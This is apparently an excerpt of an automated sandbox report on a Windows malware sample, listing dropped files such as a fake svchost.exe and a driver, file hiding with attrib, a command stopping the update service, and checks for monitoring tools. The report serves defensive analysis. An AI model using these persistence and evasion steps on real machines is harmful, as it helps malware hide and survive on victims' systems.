Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\instals.exe

File created: C:\ProgramData\Microsoft\svchost.exe

Jump to dropped file

Sample is not signed and drops a device driver

Source: C:\ProgramData\Microsoft\svchost.exe

File created: C:\Windows\TEMP\qnibnfgnagzt.sys

Uses attrib.exe to hide files

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\_socket.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\rar.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\47SXvEQ.exe	File created: C:\Users\user\AppData\Local\Temp\Built.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\libssl-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\_sqlite3.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\svchost.exe	File created: C:\Windows\Temp\qnibnfgnagzt.sys	Jump to dropped file
Source: C:\Users\user\Desktop\47SXvEQ.exe	File created: C:\Users\user\AppData\Local\Temp\instals.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\libffi-7.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\instals.exe	File created: C:\ProgramData\Microsoft\svchost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\libcrypto-1_1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI54322\_lzma.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\instals.exe

File created: C:\ProgramData\Microsoft\svchost.exe

Jump to dropped file

Source: C:\ProgramData\Microsoft\svchost.exe

File created: C:\Windows\Temp\qnibnfgnagzt.sys

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\47SXvEQ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\47SXvEQ.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\instals.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 4_2_00007FF626645820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

4_2_00007FF626645820

Source: C:\Users\user\Desktop\47SXvEQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
